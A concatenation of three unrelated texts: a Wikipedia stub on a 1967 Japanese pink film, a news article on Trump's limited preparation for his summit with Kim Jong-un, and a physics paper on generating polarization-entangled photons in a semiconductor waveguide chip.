aka Contemporary Dictionary of Love: Age of Curiosity is a 1967 Japanese pink film directed by Shin'ya Yamamoto and featuring Naomi Tani in one of her earliest starring roles.
Synopsis
While an obscene audio tape is played, a young woman has sex. She becomes obsessed with the recording and can only achieve orgasm if she is listening to it. Complications ensue when her boyfriend becomes troubled by the tape and is unable to perform sexually while it is being played.
Cast
Naomi Tani
Yumiko Matsumoto
Miki Hayashi
Background and critical appraisal
Director Shin'ya Yamamoto filmed Memoirs of Modern Love: Curious Age for Mamoru Watanabe's Watanabe Pro and it was released theatrically in Japan by Tōkyō Kōei in 1967. Yamamoto and star Naomi Tani worked together in other early pink films such as (also 1967) and (1968). They both later worked in Nikkatsu's Roman Porno films, but they did not work together in that series.
In their Japanese Cinema Encyclopedia: The Sex Films, Thomas and Yuko Mihara Weisser give Memoirs of Modern Love: Curious Age a rating of two-and-a-half out of four stars. They note that the plotline is "thin and ludicrous", and only an excuse for Tani to show her "primo body".
Bibliography
Notes
Category:1967 films
Category:Japanese films
Category:Japanese-language films
Category:Pink films
|
{
"pile_set_name": "Wikipedia (en)"
}
|
Over a series of months key experts prepared more than 20 papers for presentation to the president. Academics as well as CIA analysts were drafted for the effort. At one point, recalled one of the administration’s top Soviet affairs specialists, Jack Matlock, “we could get two or three two-hour sessions with [Reagan] a week! Try to get 15 minutes with any other president.” This is not Donald Trump’s way. The talks between Trump and Kim came about after Trump accepted the latter’s invitation on a whim during a phone call without the input of his advisors. "Meeting being planned!" tweeted Trump early one March morning. US President Donald Trump tweeted the news that a meeting with North Korea was being planned. Credit:Bloomberg
The current US State Department has been hollowed-out and stripped of key staff and funding by the administration. Its new leader, the former CIA chief Mike Pompeo, has been in place for little more than a month. His replacement at the CIA, Gina Haspel, was confirmed on May 18. An ambassador to South Korea was announced in April, when Harry Harris, who had been bound for Australia, was redirected in haste. Trump’s new national security advisor, John Bolton, has long advocated for war with North Korea and Politico has noted that in his first two months on the job did not even call a cabinet-level planning meeting to discuss the talks. Nor is the President known for his enthusiasm for painstaking preparation. Breaking with tradition Trump does not read the daily intelligence briefings prepared for him by his agencies as it does not suit his preferred “style of learning”, The Washington Post has reported. Loading Replay Replay video Play video Play video Speaking to reporters before a White House meeting with Japanese Prime Minister Shinzo Abe, Trump said: “I don't think I have to prepare very much. It's about attitude. It's about willingness to get things done.”
North Korean leader Kim Jong-un is due to travel to Singapore for the meeting. Credit:AP Trump’s approach has prompted concern in some quarters. John McLaughlin, former acting director of the CIA, told the Post’s conservative commentator - and frequent Trump critic - Jennifer Rubin, that he doubted Trump’s team. “These people have never been in a real negotiation … and have no idea how complicated this will be.” “Even in the hands of the most astute diplomats and serious presidents,” wrote Rubin, “this meeting would be a daunting proposition; in the hands of the Trump crew, the prospect of face-to-face meetings is, candidly, petrifying.” One man who does know exactly how complicated it is to negotiate with North Korea is Robert Carlin, a former CIA analyst and US State Department official who is currently a scholar with Stanford University’s Centre for International Security and Cooperation. Carlin has perhaps spent more time in face-to-face negotiations with North Korean officials than any other American. Carlin disputes the view of some US observers that negotiation with North Koreans is pointless. In a paper for the Centre for International Security and Cooperation published in 2008, Carlin wrote that US officials spent thousands of hours of often fruitful negotiation with North Korea between 1993 and 2000, before the relationship again frayed. He lamented that the lessons of those negotiations had been forgotten by American officials, to the detriment of US national security.
I don't think I have to prepare very much. It's about attitude. US President Donald Trump Recalling those talks in a recent interview with the American journal National Review, Carlin said he believes there is a possibility of a breakthrough in the coming talks. He argued that despite the lack of painstaking preparation, there were reasons for optimism, especially since talks had taken place between Pompeo and Kim. “We’re much better off than we were at the beginning of the year, when no one we knew or trusted had direct experience with Kim Jong-un,” he wrote. “We were trapped in our own bubble of ignorance. Now several people have met with Kim, and the President will have the benefit of first-hand observations on the North Korean leader.” Carlin described North Korean negotiators as tough but careful, reports The New Republic. “They are good at their game … When they get precise in their presentation, it’s important to pay attention — they mean what they say. But it’s often only possible to understand what they mean by having a good grasp of their previous positions ... My experience is that Americans sometimes don’t recognise progress when they see it from the North Koreans, and thus may miss openings.”
He said the North Korean negotiators would also be alert to signs of disrespect. “When what we are asking for flows from our sense of moral superiority rather than any pragmatic or rational basis, the North Koreans can sense it. They have good emotional radars and know when we are being condescending, speaking down to them.” And he warned that they would prosecute their case rigorously. “If we leave gaps, we can be sure they will explore them. If there are seams, they will play them. If they are uncertain about our own commitment, they will pursue hedging.” Donald Trump and Kim Jong-un are set to meet at the Capella Hotel on Sentosa Island in Singapore. Credit:AP
In a separate piece written for 38North, a website for analysis of North Korea, Carlin wrote that North Koreans are pragmatic negotiators who followed diplomatic norms. “A productive set of negotiations with them follows a pattern found anywhere in the world: Define the problem in terms that both sides can claim benefit from a solution; divide the problem into parts; move from easiest to hardest to solve; fix details and define terms; review again so that both sides understand what is and what isn’t in the agreement; agree on implementation details and timetable." He wrote that in talks with North Koreans, negotiators needed not only to be able to stand firm when they felt they had been slighted, but to be able to sit patiently and listen while North Korean officials voiced their own concerns. “Rarely do the North Koreans pound the table. More often, when we raise a point they find objectionable, they may quietly take off their glasses, close their notebooks gently, and lay their pens to the side.” The benefits of preparation, Carlin told National Review, are often to be felt in the wake of talks rather than at the table.
|
{
"pile_set_name": "OpenWebText2"
}
|
---
abstract: 'Generating nonclassical states of photons such as polarization entangled states on a monolithic chip is a crucial step towards practical applications of optical quantum information processing such as quantum computing and quantum key distribution. Here we demonstrate two polarization entangled photon sources in a single monolithic semiconductor waveguide. The first source is achieved through the concurrent utilization of two spontaneous parametric down-conversion (SPDC) processes, namely type-0 and type-I SPDC processes. The chip can also generate polarization entangled photons via the type-II SPDC process, enabling the generation of both co-polarized and cross-polarized entangled photons in the same device. In both cases, polarization entanglement is generated directly on the chip without the use of any off-chip compensation, interferometry or bandpass filtering. This enables direct, chip-based generation of both Bell states $(|H,H\rangle+|V,V\rangle)/\sqrt{2}$ and $(|H,V\rangle+|V,H\rangle)/\sqrt{2}$ simultaneously utilizing the same pump source. In addition, based on compound semiconductors, this chip can be directly integrated with it own pump laser. This technique ushers an era of self-contained, integrated, electrically pumped, room-temperature polarization entangled photon sources.'
author:
- Dongpeng Kang
- Minseok Kim
- Haoyu He
- 'Amr S. Helmy'
title: Two Polarization Entangled Sources from the Same Semiconductor Chip
---
Introduction
============
Entangled photons are essential building blocks for optical quantum information processing, such as quantum computing (QC) [@Ladd_Nature_2010] and quantum key distribution (QKD) [@Gisin_RMP_2002]. Conventionally, entangled photons have been generated using a myriad of techniques, most notably by using the process of spontaneous parametric down-conversion (SPDC) utilizing second order nonlinearities in crystals [@Christ_2013]. Properties such as brightness, scalability, compact form-factor and room temperature operation play key roles in enabling us to fully profit from entangled photon sources in applications such as QC and QKD. As such, the physics and technology of generating and manipulating entangled photons in monolithic settings have recently been topics of immense interest. Harnessing such effects in a monolithic form-factor also enables further incorporation of other photonic components that may be necessary for the aforementioned applications [@O'Brien_NP_2009; @Gaggero_APL_2010; @Silverstone_NP_2014; @Jin_PRL_2014]. This provided the drive that motivated the early work on implementing entangled sources in waveguides of crystals with appreciable second order nonlinearities such as Lithium Niobate [@Suhara_LPR_2009].
Realizing entangled photon sources in monolithic settings enables much more than the inclusion of numerous necessary components simultaneously: It can enable the direct generation of novel and useful photonic quantum states with specified properties, without moving parts, while benefiting from the accurate alignment of nano-lithography, precision of epitaxial growth and thin film deposition techniques. For example, monolithic platforms offer opportunities to provide photons that are entangled in one or several degrees of freedom simultaneously without the need for any extra component on the chip [@Zhukovsky_OL_2011; @Kang_PRA_2014]. In addition, monolithic sources can offer significant control over the spectral-temporal properties of the entangled photons with relative ease and high precision [@Abolghasem_OL_2010]. This in turn provides a powerful tool for tailoring the temporal correlation or the spectral bandwidth of the photon states. Such states can be of extremely short correlation times, which can enhance the accuracy of protocols for quantum positioning and timing [@valencia1] and the sensitivity offered by quantum illumination [@lloyd1]. The same integrated sources can generate states with extremely large temporal correlation times. This in turn leads to narrow spectral bandwidth, which can provide a more efficient atom-photon interface and improved sources for long-haul QKD [@Narrowband_Sauge].
The vast majority of the aforementioned applications use polarization entangled photon sources. Entanglement in the polarization degree of freedom has been the most widely utilized to implement entangled sources for experiments and applications that probe or exploit quantum effects. Photon pairs in polarization entangled sources need to be indistinguishable in every degree of freedom, except for polarization, which is challenging to achieve for states produced directly in waveguides [@Suhara_LPR_2009; @Kaiser_NJP_2012; @Arahira_OE_2013]. For photon pairs generated in a type-II process, in which the down-converted photons are cross-polarized, the birefringence in the group velocities of the modes, where the photons propagate, will cause a temporal walk-off between the pair, allowing polarization to be inferred from the photon arrival time. On the other hand, for photon pairs generated in a type-0 or type-I process, where the photons in a pair are co-polarized, there is a lack of two orthogonal polarizations necessary for polarization entanglement. As a result, most waveguide sources of photon pairs require an off-chip compensation setup [@Kaiser_NJP_2012] or an interferometer [@Arahira_OE_2013] to generate polarization entanglement, which increases the source complexity and decreases the system stability significantly.
Recently, several techniques have been demonstrated to generate polarization entangled photons from a monolithic chip [@Matsuda_SR_2012; @Olislager_OL_2013; @Orieux_PRL_2013; @Horn_SR_2013]. The approaches which use spontaneous four-wave mixing (SFWM) in Si-based chips utilize integrated photonic components such as on-chip polarization rotators [@Matsuda_SR_2012] or 2D grating couplers [@Olislager_OL_2013], and benefit from mature fabrication technologies. However, the indirect bandgap of Si presents significant challenges for further integration with the pump lasers. To this end, III-V semiconductor material systems offer an optimal solution in terms of functionality to tailor the dispersion and birefringence as well as monolithic integration with the pump lasers [@Bijlani_APL_2013; @Boitier_PRL_2014]. Techniques using the counterpropagating phase-matching (PM) scheme [@Orieux_PRL_2013] and modal PM in Bragg reflection waveguides (BRWs) [@Horn_SR_2013] based on AlGaAs have been demonstrated. In the former case, however, the requirement of two pump beams with strictly controlled incidence angles and beam shapes imposes significant challenge for further integration, while in the latter case, the spectral distinguishability and walk-off due to modal birefringence compromises the quality of entanglement.
In this work, we demonstrate how the waveguiding physics associated with BRWs can be used to simultaneously produce two polarization entangled photon sources using alternative approaches in a single self-contained, room-temperature semiconductor chip. The waveguide structure utilized is schematically shown in Fig. \[Fig:structure\_SPDC\_SEM\](a). The chip, based on a single monolithic semiconductor BRW, is straightforward to design and implement and has no moving parts. The technique allows direct polarization entanglement generation using an extremely simple setup without any off-chip walk-off compensation, interferometer, or even bandpass filtering. The first source is achieved through the concurrent utilization of two second order processes, namely type-0 and type-I SPDC processes, pumped by a single waveguide mode [@Kang_OL_2012] as opposed to two modes of different polarizations [@Matsuda_SR_2012] or modes propagating in opposite directions [@Orieux_PRL_2013]. This approach permits the integration of the pump with the source in a monolithic form. Within the same waveguide, there exists a second source based on type-II process due to the lack of material birefringence [@Horn_SR_2013]. The virtual energy diagrams of the two sources are also schematically shown in Fig. \[Fig:structure\_SPDC\_SEM\](a). As such, in this approach, by varying the pump polarization and wavelength, one can select between both polarization entangled sources or use them concomitantly. The direct generation of both Bell states $(|H,H\rangle+|V,V\rangle)/\sqrt{2}$ and $(|H,V\rangle+|V,H\rangle)/\sqrt{2}$ on a single chip can be envisaged. In addition, by lithographically tuning the waveguide ridge width, one can tune the degree of entanglement of the first source.
Methods
=======
For concurrent type-0 and type-I processes with a shared TM polarized pump, paired photons can be either generated in TM polarizations via the type-0 process, or in TE polarizations via type-I process. In the ideal case, photon pairs can be produced from the two processes with the same efficiency and identical spectrum, which renders them in a maximally entangled state $(|H,H\rangle+\exp{i\phi}|V,V\rangle)/\sqrt{2}$. This is the approach which we shall pursue to obtain a chip-based entangled source using the type-0 and type-I interactions.
The AlGaAs structure used to demonstrate these sources was grown on a \[001\] GaAs substrate and the waveguide direction was oriented along \[110\]. Due to the zinc-blende crystal symmetry, the nonlinear tensor $\chi^{(2)}_{ijk}$ is non-zero only when $i\neq j\neq k$, with $i,j,k=x,y,x$ being the crystal coordinates. As a result, three SPDC processes, namely type-0, type-I, and type-II could coexist provided PM is satisfied. Among them, type-0 process depends on the electric field components of the interacting modes along the propagation direction, which are usually negligible in weakly guided waveguides. In BRWs, however, due to the index variations between different layers, the efficiency of type-0 process can be significant and can even be markedly tuned by engineering the epitaxial structure [@Kang_OL_2012]. In order to achieve concurrent PM of type-0 and type-I processes, the effective indices of the pump $n_{\text{TM}}(2\omega)$ should be equal to those of the down-converted photons $n_{\text{TE}}(\omega)$ and $n_{\text{TM}}(\omega)$ simultaneously, i.e., $n_{\text{TM}}(2\omega)=n_{\text{TE}}(\omega)=n_{\text{TM}}(\omega)$, with $\omega$ indicating the degenerate PM frequency of the down-converted photons, and TE, TM indicating the polarizations. This requirement can be satisfied lithographically by tuning the ridge width.
The two photon state generated via the two concurrent SPDC processes is given by [@Kang_PRA_2014; @Zhukovsky_JOSAB_2012] $$\begin{aligned}
\left|\psi\right\rangle=&\frac{1}{\sqrt{\eta_{\text{I}}+\eta_0}}\iint d\omega_1 d\omega_2[\sqrt{\eta_{\text{I}}}\Phi_{HH}(\omega_1,\omega_2)|H\omega_1,H\omega_2\rangle \nonumber\\
&+\sqrt{\eta_0}\Phi_{VV}(\omega_1,\omega_2)|V\omega_1,V\omega_2\rangle],
\label{Eq:state}\end{aligned}$$ where $\eta_{\text{I}}$, $\eta_{0}$ are the generation rates (pairs per pump photon) of the two processes after taking into account the losses. $\Phi_{HH}(\omega_1,\omega_2)$ and $\Phi_{VV}(\omega_1,\omega_2)$ are the biphoton wavefunctions, with the subscripts indicating the photon polarizations, and satisfy the normalization condition $\iint{d\omega_1 d\omega_2|\Phi_{HH(VV)}(\omega_1,\omega_2)|^2}=1$. When spatially separated, the paired photons are polarization entangled. The two spectra are found to be almost identical, as shown in Fig. \[Fig:spectra\](a). As a result, Eq. (\[Eq:state\]) is maximally entangled when the generation rates are the same, i.e., $\eta_{\text{I}}=\eta_0$. In this case, there is no way, even in principle, to tell in which process a pair of photons are generated unless polarizations are measured. Therefore, polarization entangled photons can be generated inherently on the chip without the need of any extra component.
Polarization entanglement can also be produced by the type-II process on the same chip. Following the same formalism, the two-photon state of the type-II process can be explicitly written as $$\begin{aligned}
\left\vert\psi^{\prime}\right\rangle=&\frac{1}{\sqrt{2}}\iint{d\omega_{1}d\omega_{2}}[\Phi_{HV}(\omega_1,\omega_2)|H\omega_1,V\omega_2\rangle \nonumber\\
&+\Phi_{VH}(\omega_1,\omega_2)|V\omega_1,H\omega_2\rangle].
\label{Eq:state_type-II}\end{aligned}$$ For maximal entanglement, it requires $\Phi_{HV}(\omega_1,\omega_2)=\Phi_{VH}(\omega_1,\omega_2)$. This is not satisfied for the waveguide under test. However, due to the lack of material birefringence, and thus very small temporal walk-off, there exists a significant amount of overlap between $\Phi_{HV}(\omega_1,\omega_2)$ and $\Phi_{VH}(\omega_1,\omega_2)$. The corresponding spectra are shown in Fig. \[Fig:spectra\](b). As a result, entanglement exists even without any compensation and bandpass filtering.
![(Color online) (a) The simulated spectral intensities of $H$ and $V$ polarized photons generated via the type-I and type-0 process, respectively; and (b) those of photons generated via the type-II process. The waveguide length is assumed to be 1.05 mm, the same as the waveguide tested in the experiment.[]{data-label="Fig:spectra"}](spectra_all_2){width="0.99\columnwidth"}
Photons in a pair need to be spatially separated. In this work, we used a 50:50 beamsplitter to separate photons non-deterministically followed by post-selection. However, paired photons can also be separated deterministically by a dichroic mirror or integrated dichroic splitter as was done in [@Horn_SR_2013]. For an ideal dichroic mirror which has a splitting wavelength at the degenerate point, the degree of entanglement is identical to that using a 50:50 beamsplitter.
Sample Description and Experimental Details
===========================================
As a proof of principle demonstration, a wafer designed for type-I PM around 1550 nm [@Abolghasem_OE_2010] is used to demonstrate this entangled photon source. Waveguides of this structure are lithographically tuned in order to satisfy concurrent PM of type-0 and type-I processes, with an etch depth of 6.5 $\mu$m and multiple ridge widths centered at 1.5 $\mu$m with a step size of 20 nm. An SEM image of a waveguide is shown in Fig. \[Fig:structure\_SPDC\_SEM\](b). Numerical simulations predict that concurrent PM of the two types can be achieved at a wavelength around 1.63 $\mu$m with a ridge width of $\sim$1.5 $\mu$m. Note that redesigning the epitaxial structure can shift the center wavelength to 1550 nm [@Kang_OL_2012]. The sample under test had a length of 1.05 mm.
In order to select the waveguide that has the best alignment of their PM wavelengths, second harmonic generation (SHG) for both type-0 and type-I processes were tested. The experiment was carried out on a standard end-fire coupling setup by pumping the waveguides with an optical parametric oscillator (OPO) pumped by a femtosecond pulsed Ti:Sapphire laser. The normalized SHG tuning curves of the waveguide under test are shown in Fig. \[Fig:PM wavelength\](a). According to Fig. \[Fig:PM wavelength\](a), PM wavelengths of both types are near 1640 nm, the longest achievable wavelength of the OPO used. Due to the large bandwidth of the pump pulse, the exact PM wavelengths could not be accurately identified. SPDC was then carried out by pumping the waveguides with a CW Ti:Sapphire laser where the dependence of single photon count rate on the pump wavelength was measured. This allowed us to locate the waveguide which has the best overlap in PM wavelengths among all tested waveguides. The results of the waveguide selected, shown in Fig. \[Fig:PM wavelength\](b), indicates that the PM wavelengths of both types are $816.7\pm0.3$ nm. The uncertainty in the PM wavelength measurement was due to the pump power fluctuation in the waveguide because of Fabry-–Pérot resonances, which could not be resolved with instrumentation available.
To generate polarization entangled photons via concurrent type-0 and type-I processes, the TM polarized pump beam from a CW Ti:sapphire laser was coupled into the waveguide using a 100$\times$ (N.A.=0.90) objective lens, with a power of 1.13 mW before the lens. Photon pairs generated were collected by a 40$\times$ objective lens at the output facet and passed through long pass filters to eliminate the pump. After their separation using a 50:50 beamsplitter, the signal and idler photons were collected into multimode fibers and detected by two InGaAs single photon detectors. The signal arm detector (ID220, ID Quantique) operates in a free-running mode and provided 20% efficiency at 1550 nm. The idler detector (ID210, ID Quantique) was operating in a gated mode and provided 25% at 1550 nm. It was externally triggered by the detection events of the first detector. An optical delay was added before the second detector to compensate for the electronic delay between the two detectors. Both detectors had a deadtime of 20 $\mu$s. The coincidence counts were recorded with the help of a time-to-digital converter (TDC) circuitry. At the degenerate wavelength of $\sim$1635 nm, the detection efficiencies are around 4% and 5%, respectively. A pair of quarter-wave plates (QWPs) and polarizers were used to measure the polarizations of the photon pairs. The schematic of the experimental setup is illustrated in Fig. \[Fig:setup\].
Considering the transmission coefficients of the output objective lens (90%), long pass filters (70%), beamsplitter (43%), QWPs and polarizers (75%) and fiber collection efficiencies in each path (53% and 34%), the overall collection efficiency of photon pairs with respect to the position right after the waveguide output facet was found to be $\sim$1.5%.
Results and Discussion
======================
Typical coincidence histograms are given in Fig. \[Fig:histograph\](a) for two $H$ polarized photons and Fig. \[Fig:histograph\](b) for two $V$ polarized photons for a pump wavelength of 816.76 nm and an integration time of 3 minutes. The coincidence peaks indicate that photon pairs were generated via both type-I and type-0 processes. The high level of accidental counts is due to detector dark counts and broken photon pairs due to waveguide losses as well as limited collection (1.5%) and detection (0.2%) efficiencies. By blocking the idler arm, we found the dark counts of the second detector consists of 83% of the total accidental counts. Thus we can expect a much higher coincidence-to-accidental (CAR) ratio by redesigning a sample which generates photon pairs in region where the detectors are more efficient (e.g. at 1550 nm).
![(Color online) Coincidence histograms of photon pairs in the (a) $HH$ and (b) $VV$ basis for an integration time of 3 minutes. The red bars around the peaks represent the counts in the coincidence window of $\sim$0.5 ns.[]{data-label="Fig:histograph"}](histograph){width="0.95\columnwidth"}
The net coincidence count rates for both type-0 and type-I processes are around 0.7 Hz, after subtracting the accidental counts. Taking into account the signal arm detector’s dead time, single count rate (16 kHz), as well as the overall collection and detection efficiencies, we estimate the photon pair generation rates after the waveguide are $3.4\times10^4$ pairs/s. The input objective lens has a transmission of 70% and the coupling efficiency into the pump Bragg mode is estimated to be 6%, resulting in an internal pump power of 47.3 $\mu$W right after the input facet. Therefore, the photon pair production rates are both around $7.3\times10^5$ pairs/s/mW with respect to the internal pump power and external photon pairs, or equivalently, $1.8\times10^{-10}$ pairs/pump photon. The fact that both processes have roughly the same generation rates, as opposed to type-I being more efficient than type-0 according to theoretical calculation, could be because that the TM mode has a smaller loss than that of the TE mode in this type of deeply etched waveguides. We confirmed this by measuring the losses using Fabry-–Pérot method and found the losses are 4.3 cm$^{-1}$ and 2.5 cm$^{-1}$ for TE and TM modes, respectively. It could also be because the pump wavelength is slightly detuned from the degenerate PM wavelength of the more efficient process, as the two processes may not have exactly identical PM wavelengths.
Quantum state tomography measurements were then subsequently performed by projecting the paired photons into 16 polarization combinations and the density matrix was reconstructed using the maximal likelihood method [@James_PRA_2001; @note2]. The net density matrix $\rho$ of the output two-photon state, given by Fig. \[Fig:rho\], is found to have a concurrence [@Wootters_PRL_1998] of $0.85\pm 0.07$. The maximum fidelity with a maximally entangled state $|\Phi\rangle=(|H,H\rangle+\exp{(i\phi)}|V,V\rangle)/\sqrt{2}$, defined by $F=\max_{\phi}{\langle\Phi|\rho|\Phi\rangle}$, is 0.89 with a corresponding phase angle $\phi=40^{\circ}$. The non-zero phase $\phi$ is because of the slightly dissimilar degenerate PM wavelengths of the two processes. Theoretical calculation according to Eq. (\[Eq:state\]) shows that this phase value is due to the type-I PM wavelength being $\sim$0.02 nm shorter than that of the type-0 process. The imperfection of the entanglement could be mainly because the pump wavelength is not optimal, causing extra spectral distinguishability between the two processes. This can be improved by using a tunable diode laser which has a fine spectral tunability. In addition, the mechanical drift of the characterization setup could result in an increase of mixture and a decrease of entanglement for measurements longer than a few minutes.
![(Color online) (a) The turning curves of the type-I (top) and type-0 (bottom) processes weighted by the corresponding efficiencies. The white dashed lines represent the pump wavelength, and (b) the corresponding spectra of the down-converted photons.[]{data-label="Fig:tuning_curves_and_spectra"}](tuning_curves_and_spectra_2){width="0.95\columnwidth"}
The fact that a slightly different PM wavelengths causes one of the processes to take place below its maximal generation rate can be used to balance the generation rates of the two processes and therefore increase the degree of entanglement. Although engineering efforts can be made to achieve almost identical efficiencies, in reality, there may still be differences especially with the existence of polarization dependent losses. In such a case, the waveguide ridge width can be lithographically tuned such that the stronger process has a shorter PM wavelength, while the pump wavelength should be tuned to the degenerate PM wavelength of the weaker process.
To illustrate this point, we consider an example where the type-I process is twice efficient as the type-0 process, i.e., $\eta_{\text{I}}=2\eta_{0}$. In the case where the two PM wavelengths are identical, the theoretical fidelity to a maximally entangled state is 0.96, and the concurrence is 0.93. The degree of entanglement can be increased to near maximum by tuning the ridge width such that the PM wavelength of type-I process is 0.55 nm below that of type-0 process. The corresponding tuning curves of the two processes weighted by their efficiencies are shown in Fig. \[Fig:tuning\_curves\_and\_spectra\](a). The pump wavelength, marked by the white line, is fixed at the degenerate PM wavelength of type-0 process. In this case, the spectra, given by Fig. \[Fig:tuning\_curves\_and\_spectra\](b), show almost the same amplitude, indicating the two processes having the same spectral brightness near the degenerate wavelength. By utilizing a weak spectral filtering with a bandwidth of 80 nm, the calculated fidelity and concurrence are increased to 0.997 and 0.995, respectively, with $\phi=34^{\circ}$, indicating the generation of maximally entangled photons. Without bandpass filtering, the maximum fidelity and concurrence can still reach 0.99 and 0.97, respectively, with a phase $\phi=14^{\circ}$, when the type-I PM wavelength is 0.36 nm below that of type-0 process.
In addition, this tuning approach could be used to generate non-maximally entangled states $(|H,H\rangle+r\exp{(i\phi)}|V,V\rangle)/\sqrt{1+r^2}$ with a tunable value of $r$, which offers significant advantages over maximally entangled states in some applications such as closing the detection loophole in quantum nonlocality tests [@Christensen_PRL_2013].
Lastly, we show the generation of cross-polarized entangled photons on the same chip via the type-II process. For a TE polarized pump at 812.92 nm, which is only less than 4 nm below those of type-0 and type-I, the output state, again without any compensation and bandpass filtering, shows a concurrence of $0.55\pm 0.08$ and a fidelity of 0.74 to the maximally entangled state $(|H,V\rangle+\exp{i\phi}|V,H\rangle)/\sqrt{2}$. The degree of entanglement is comparable with that obtained in [@Horn_SR_2013]. The reconstructed density matrix is given by Fig. \[Fig:rho\_type-II\]. The utility of this device becomes most apparent when one considers its capability to have all three types of PM simultaneously achieved at the same wavelength via the tuning of the epitaxial structure combined with ridge width control [@Zhukovsky_OC_2013]. The unique ability to achieve this monolithically allows the generation of both co-polarized and cross-polarized polarization entangled photons on the same chip at the same pump wavelength, by simply selecting the pump polarization. Nevertheless, a few nanometres’ difference in the PM wavelength can be covered by a femtosecond pump laser.
Conclusion
==========
In conclusion, we have demonstrated how the waveguiding physics associated with BRWs can be used to simultaneously produce two polarization entangled photon sources using alternative approaches in a single self-contained, room-temperature semiconductor chip. Direct generation of polarization entangled photons from a monolithic compound semiconductor chip via concurrent type-0 and type-I SPDC processes has been characterized. Simultaneous PM of the two processes was achieved using simple lithographic control on the ridge width of BRWs. Without the need of off-chip compensation, interferometer, and bandpass filter, the degree of entanglement is among the highest in previous demonstrations from monolithic III-V and Si chips. In addition, the same device can also directly generate polarization entanglement via the type-II process, with a pump wavelength of only 4 nm shorter.
Further improving the device performance relies largely on improved fabrications. By reducing the waveguide losses, the generation rates can potentially be increased by more than two orders of magnitudes, as predicted in [@Zhukovsky_JOSAB_2012] for lossless waveguides. In addition, the degree of entanglement can be increased by fine-tune the ridge width via more precise fabrications, as we have shown that the entanglement can be nearly maximal in the ideal case [@Kang_OL_2012]. The degree of entanglement can also be easily increased by bandpass filtering [@note].
Note that previous work on ferro-electric waveguides also studied the diversity of multiple PM processes to generate quantum states of particular properties, such as using two quasi-phase matching (QPM) gratings to generate polarization entangled photons [@Herrmann_OE_2013; @Gong_PRA_2011] and using different spatial modes to achieve mode entanglement [@Mosley_PRL_2009]. While they are fundamentally important, realizing such effects in monolithic fashions, especially on III-V semiconductor platforms as in this work, ushers a new era of practical optical quantum information processing.
Acknowledgements {#acknowledgements .unnumbered}
================
The authors would like to acknowledge R. Marchildon, G. Egorov, F. Xu, E. Zhu, and Z. Tang for helpful discussions. This work was supported by Natural Sciences and Engineering Research Council of Canada (NSERC).
[99]{} T. D. Ladd, F. Jelezko, R. Laflamme, Y. Nakamura, C. Monroe, and J. L. O’Brien, Nature **464**, 45 (2010).
N. Gisin, G. Ribordy, W. Tittel, and H. Zbinden, Rev. Mod. Phys. **74**, 145 (2002).
A. Christ, A. Fedrizzi, H. Hübel, T. Jennewein, and C. Silberhorn, Exper. Methods Phys. Sci. **45**, 351 (2013).
J. L. O’Brien, A. Furusawa, and J. Vučković, Nature Photon. **3**, 687 (2009).
A. Gaggero, S. Jahanmiri Nejad, F. Marsili, F. Mattioli, R. Leoni, D. Bitauld, D. Sahin, G. J. Hamhuis, R. Nötzel, R. Sanjines, and A. Fiore, Appl. Phys. Lett. **97**, 151108 (2010).
J. W. Silverstone, D. Bonneau, K. Ohira, N. Suzuki, H. Yoshida, N. Iizuka, M. Ezaki, C. M. Natarajan, M. G. Tanner, R. H. Hadfield, V. Zwiller, G. D. Marshall, J. G. Rarity, J. L. O’Brien, and M. G. Thompson, Nature Photon. **8**, 104 (2014)
H. Jin, F. M. Liu, P. Xu, J. L. Xia, M. L. Zhong, Y. Yuan, J. W. Zhou, Y. X. Gong, W. Wang, and S. N. Zhu, Phys. Rev. Lett. **113**, 103601 (2014).
T. Suhara, Laser Photon. Rev. **3**, 370 (2009).
S. V. Zhukovsky, D. Kang, P. Abolghasem, L. G. Helt, J. E. Sipe, and A. S. Helmy, Opt. Lett. **36**, 3548 (2011).
D. Kang, L. G. Helt, S. V. Zhukovsky, J. P. Torres, J. E. Sipe, and A. S. Helmy, Phys. Rev. A **89**, 023833 (2014).
P. Abolghasem, M. Hendrych, X. Shi, J. P. Torres, and A. S. Helmy, Opt. Lett. **34**, 2000 (2009).
A. Valencia, G. Scarcelli, and Y. H. Shih, Appl. Phys. Lett. **85**, 2655 (2004).
S. Lloyd, Science [**321**]{}, 1463 (2008).
S. Sauge, M. Swillo, S. Alber-Seifried, G. B. Xavier, J. Waldeback, M. Tengner, D. Ljunggren and A. Karlsson, Opt. Express **15**, 6926 (2007). F. Kaiser, A. Issautier, L. A. Ngah, O. Dănilă, H. Herrmann, W. Sohler, A. Martin, and S. Tanzilli, New J. Phys. **14**, 085015 (2012).
S. Arahira and H. Murai, Opt. Express **21**, 7841 (2013).
N. Matsuda., H. L. Jeannic, H. Fukuda, T. Tsuchizawa, W. J. Munro, K. Shimizu, K. Yamada, Y. Tokura, and H. Takesue, Sci. Rep. **2**, 817 (2012).
L. Olislager, J. Safioui, S. Clemmen, K. P. Huy, W. Bogaerts, R. Baets, P. Emplit, and S. Massar, Opt. Lett. **38**, 1960 (2013).
A. Orieux, A. Eckstein, A. Lemaître, P. Filloux, I. Favero, G. Leo, T. Coudreau, A. Keller, P. Milman, and S. Ducci, Phys. Rev. Lett. **110**, 160502 (2013).
R. T. Horn, P. Kolenderski, D. Kang, P Abolghasem, C. Scarcella, A. D. Frera, A. Tosi, L. G. Helt, S. V. Zhukovsky, J. E. Sipe, G. Weihs, A. S. Helmy, and T. Jennewein, Sci. Rep. **3**, 2314 (2013).
B. J. Bijlani, P. Abolghasem, and A. S. Helmy, Appl. Phys. Lett. **103**, 091103 (2013).
F. Boitier, A. Orieux, C. Autebert, A. Lemaitre, E. Galopin, C. Manquest, C. Sirtori, I. Favero, G. Leo, and S. Ducci, Phys. Rev. Lett. **112**, 183901 (2014).
D. Kang and A. S. Helmy, Opt. Lett., **37**, 1481 (2012).
S. V. Zhukovsky, L. G. Helt, P. Abolghasem, D. Kang, J. E. Sipe, and A. S. Helmy, J. Opt. Soc. Am. B **29**, 2516 (2012).
P. Abolghasem, J. B. Han, B. J. Bijlani, and A. S. Helmy, Opt. Express **18**, 12861 (2010).
D. F. V. James, P. G. Kwiat, W. J. Munro, and A. G. White, Phys. Rev. A **64**, 052312 (2001).
The density matrix reconstruction was performed using the program provided on [P. Kwiat group’s website](http://webusers.physics.illinois.edu/~tomowww/TomographyDemo.php).
W. K. Wootters, Phys. Rev. Lett. **80**, 2245 (1998).
